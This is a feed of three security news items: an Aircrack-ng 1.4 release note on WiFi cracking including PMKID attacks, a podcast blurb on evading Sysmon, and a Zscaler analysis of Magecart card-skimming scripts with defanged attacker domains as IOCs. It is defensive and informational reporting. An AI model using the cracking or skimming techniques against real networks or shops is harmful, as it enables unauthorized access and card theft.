Aircrack-ng 1.4 – Complete Suite Of Tools To Assess WiFi Network Security

Aircrack-ng is a complete suite of tools to assess WiFi network security.It focuses on different areas of WiFi security:Monitoring: Packet capture and export of data to text files for further processing by third party tools.Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.Testing: Checking WiFi cards and driver capabilities (capture and injection).Cracking: WEP and WPA PSK (WPA 1 and 2).All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily Linux but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.Aircrack-ng 1.4It focuses a lot on code quality and adds a few visible features:PMKID crackingCrack 802.11w capture filesSpeed and memory usage improvement when loading (large) files with Aircrack-ng and Airdecap-ngPackages for Linux distributions and WindowsFix building on various platformsImproved and tweaked our CI/CD processesUsing new CI/CD tools for our buildbots and packaging, PyDeployerAlmost doubled the amount of testsPMKIDOn routers with 802.11i/p/r, the AP can cache an “ID" for the connection so roaming clients don’t have to waste frames reauthenticating and just use the PMKID, which helps decrease a bit the latency (from 6 frames to only 2).Calculation is of the PMKID is done this way:PMKID = HMAC-SHA1-128(PMK, "PMK Name" | BSSID | STA MAC)A big advantage here is that this PMKID is present in the first EAPoL frame of the 4-way handshake.A few caveats about this attack:Sometimes APs send empty PMKIDIt doesn’t work on WPA/WPA2 Enterprise networksWhen loading a PCAP, Aircrack-ng will detect if it contains a PMKID. In the following screenshot, it is present for the network ogogo, notice the "with PMKID" on the same line:When selecting the network, it will use it as if it were a regular PCAP with a handshake (and thus the wordlist requirement applies).If you’d like to test, two capture files with PMKID are available this test files:test-pmkid.pcaptest1.pcapMore details about the attack itself can be found in this post.More info: https://aircrack-ng.blogspot.com/2018/09/aircrack-ng-14.htmlInstallgit clone https://github.com/aircrack-ng/aircrack-ngcd aircrack-ng./autogen.shmakemake installcd src/aircrack-ngDownload Aircrack-ng

Link: http://feedproxy.google.com/~r/PentestTools/~3/yuSK_tUptqQ/aircrack-ng-14-complete-suite-of-tools.html

Offensive Operating Against SysMon, Carlos Perez – Paul’s Security Weekly #577

Carlos Perez delivers the Technical Segment on How to Operate Offensively Against Sysmon. He talks about how SysMon allows him to create rules, and track specific types of tradecraft, around process creation and process termination. He dives into network connection, driver loading, image loading, creation of remote threats, and more! Full Show NotesVisit our website: […]
The post Offensive Operating Against SysMon, Carlos Perez – Paul’s Security Weekly #577 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/ZcUh9FtxQUc/

Magecart campaign remains active

The Zscaler ThreatLabZ team has been tracking the Magecart campaign for several months. Magecart is a notorious hacker group that has been responsible for large attacks on the e-commerce sites of well-known brands, and we have continued to see its activity during this past month. In this blog, we will examine this campaign’s recent activity and its methods for skimming credit and debit card information for financial gain. The e-commerce sites targeted by Magecart are being compromised and injected with malicious, obfuscated JavaScript, which, in turn, tries to tap into purchase transactions. Injected script typically adds a form to the payment page at runtime using Document Object Model (DOM) properties. This form captures information such as the site’s domain, credit card details, and the user’s personal information, and then makes a POST request, sending all stolen information to remote site. Magecart compromise sample As shown in the screenshot below, the attacker compromises the site and injects a script tag in order to dynamically load a highly obfuscated JavaScript code hosted remotely. Figure 1: Magecart compromised site The obfuscated JavaScript code as well as the deobfuscated version of the same can be seen below. This is a common technique leveraged by the attackers to evade detection by security crawlers. Figure 2: Injected JavaScript code for stealing information As shown in the image below, this script tries to steal financial and personal information from the form input elements of the target site, and sends the collected information back to the attacker-controlled site. Figure 3: POST request with stolen information The domain used by the attacker to host malicious scripts and receive stolen information was registered in early September 2018. This newly registered domain is part of a trend we are seeing that minimizes the attacker’s chances of getting blocked based on reputation engines, as the site is too new to have a low rating. Fun fact: the attacker also listed this domain for sale. Figure 4: Attacker’s domain registration Below are hits we have seen from MageCart campaign in past month.    Figure 5: Campaign activity in past month Although this campaign is not new, we continue to see newer domains being leveraged and additional e-commerce sites being impacted on a regular basis. Scripts used in the new and previous campaigns are similar; both domains are hosted on AS24936 Moscow, and may involve the same actor. Here is a comparison of the deobfuscated JavaScript. Figure 6: Deobfuscated JavaScript Sites compromised by Magecart can easily be searched from publicly available data (PublicWWW and Censys.io).  Figure 7: Sites infected with Magecart Although magentacore[.]net is not responding at the moment, infected domains/URLs can be searched on PublicWWW. Compromised sites seen recently by ThreatLabZ can be found here. IOCs 83.166.243[.]206 magento[.]name/mage/mage.js magento[.]name/mage/mail2.php magentocore[.]net/mage/mage.js magentocore[.]net/mage/mail2.php References: https://gwillem.gitlab.io/2018/08/30/magentocore.net_skimmer_most_aggressive_to_date/ https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/ Conclusion: Attackers are increasingly creative in their methods for generating income, whether through cryptomining, fake tech support scams, or, as in the case of Magecart campaigns, skimming for credit and debit card information. Magecart has been responsible for large-scale attacks on well-known brands, and the ThreatLabZ team will continue to monitor its activities to ensure coverage for Zscaler customers.

Link: https://www.zscaler.com/blogs/research/magecart-campaign-remains-active